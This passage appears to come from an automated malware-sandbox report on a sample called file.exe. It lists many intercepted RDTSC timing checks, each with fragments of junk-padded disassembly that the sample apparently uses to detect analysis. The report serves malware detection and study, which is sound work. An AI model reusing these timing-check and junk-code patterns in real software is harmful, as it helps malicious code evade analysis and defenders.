0x0000006d jmp 00007EFFAC79DCD6h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D2A76h], ebx 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jc 00007EFFAC79DCC8h 0x00000085 pushad 0x00000086 popad 0x00000087 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AE1 second address: 11D2AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AE5 second address: 11D2AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007EFFAC79DCC8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AF9 second address: 11D2AFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AFE second address: 11D2B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007EFFAC79DCD9h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2B3E second address: 11D2B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007EFFACBF2F88h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f xor edi, dword ptr [ebp+122D2C4Bh] 0x00000035 push 65585B3Dh 0x0000003a push eax 0x0000003b push edx 0x0000003c push esi 0x0000003d jmp 00007EFFACBF2F8Dh 0x00000042 pop esi 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2B8C second address: 11D2B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CA6 second address: 11D2CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ebx, ecx 0x0000000c popad 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFFACBF2F8Eh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CC4 second address: 11D2CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CCA second address: 11D2CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CCE second address: 11D2CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFFAC79DCCCh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CE5 second address: 11D2CEA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2E4A second address: 11D2E4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2FCD second address: 11D2FD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D338F second address: 11D3395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3395 second address: 11D3399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3399 second address: 11D339D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D339D second address: 11D3404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007EFFACBF2F88h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 je 00007EFFACBF2F8Ch 0x0000002c add ebx, dword ptr [ebp+122D332Bh] 0x00000032 adc edx, 3A446026h 0x00000038 popad 0x00000039 push 0000001Eh 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007EFFACBF2F88h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 mov di, 6B4Ah 0x00000059 nop 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3404 second address: 11D3439 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFFAC79DCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007EFFAC79DCDFh 0x00000010 popad 0x00000011 push eax 0x00000012 jl 00007EFFAC79DCD0h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB4BA second address: 11BB4C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12105DA second address: 12105DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12105DE second address: 12105E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210844 second address: 121084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121084A second address: 121085B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007EFFACBF2F86h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121085B second address: 1210860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121575D second address: 121577D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFFACBF2F86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007EFFACBF2F8Ah 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121577D second address: 1215792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD0h 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215904 second address: 1215921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFACBF2F98h 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215921 second address: 121592B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFFAC79DCC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215DC7 second address: 1215DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215F1E second address: 1215F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215F23 second address: 1215F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007EFFACBF2F86h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216234 second address: 1216251 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFFAC79DCC6h 0x00000008 jmp 00007EFFAC79DCD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216251 second address: 1216298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F96h 0x00000007 pushad 0x00000008 jnp 00007EFFACBF2F86h 0x0000000e jmp 00007EFFACBF2F97h 0x00000013 jmp 00007EFFACBF2F8Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163DE second address: 12163E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216983 second address: 121699E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFFACBF2F96h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12151ED second address: 12151F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12151F6 second address: 12151FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12151FC second address: 1215229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007EFFAC79DCD9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C62B second address: 121C632 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A7DC second address: 118A7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD2h 0x00000009 jng 00007EFFAC79DCC6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A7FD second address: 118A801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A801 second address: 118A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007EFFAC79DCCDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B489 second address: 121B4A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F8Bh 0x00000007 jns 00007EFFACBF2F86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jo 00007EFFACBF2F86h 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B4A6 second address: 121B4E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007EFFAC79DCD9h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007EFFAC79DCD2h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BAA2 second address: 121BAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BAAF second address: 121BAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BAB4 second address: 121BAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BAB9 second address: 121BACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFFAC79DCC6h 0x0000000a jp 00007EFFAC79DCC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B033 second address: 121B03B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B03B second address: 121B079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD3h 0x00000007 jo 00007EFFAC79DCC8h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jno 00007EFFAC79DCDBh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B079 second address: 121B085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFFACBF2F86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B085 second address: 121B08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C07D second address: 121C081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C350 second address: 121C36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD7h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223DE3 second address: 1223DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224241 second address: 1224247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224247 second address: 122424B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122424B second address: 1224254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224254 second address: 1224263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007EFFACBF2F86h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224263 second address: 1224297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007EFFAC79DCC6h 0x00000013 jmp 00007EFFAC79DCD4h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224297 second address: 122429D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11872CB second address: 11872D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12265FE second address: 1226645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFFACBF2F92h 0x0000000f jmp 00007EFFACBF2F99h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226645 second address: 122664A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122664A second address: 122666D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFACBF2F97h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122666D second address: 1226671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AE7C second address: 122AE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AFF4 second address: 122AFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB1A second address: 122EB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007EFFACBF2F99h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB3D second address: 122EB60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFAC79DCD1h 0x00000011 je 00007EFFAC79DCC6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB60 second address: 122EB74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007EFFACBF2F8Ch 0x0000000e jbe 00007EFFACBF2F86h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB74 second address: 122EB87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB87 second address: 122EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF5E second address: 122EF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFFAC79DCCBh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF70 second address: 122EF76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF76 second address: 122EF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF7C second address: 122EF83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234C11 second address: 1234C17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234C17 second address: 1234C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007EFFACBF2F8Ah 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12337DF second address: 1233818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jnp 00007EFFAC79DCC6h 0x0000000c pop edi 0x0000000d jmp 00007EFFAC79DCD2h 0x00000012 jmp 00007EFFAC79DCD4h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233818 second address: 123381C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123381C second address: 1233836 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFAC79DCC6h 0x00000008 jo 00007EFFAC79DCC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123398F second address: 1233995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233995 second address: 123399C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123399C second address: 12339A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12339A2 second address: 12339A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233B15 second address: 1233B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233B19 second address: 1233B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233B1D second address: 1233B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233C3E second address: 1233C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD8h 0x00000009 popad 0x0000000a jmp 00007EFFAC79DCCFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFFAC79DCD2h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233DBA second address: 1233DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F90h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233F22 second address: 1233F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007EFFAC79DCC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
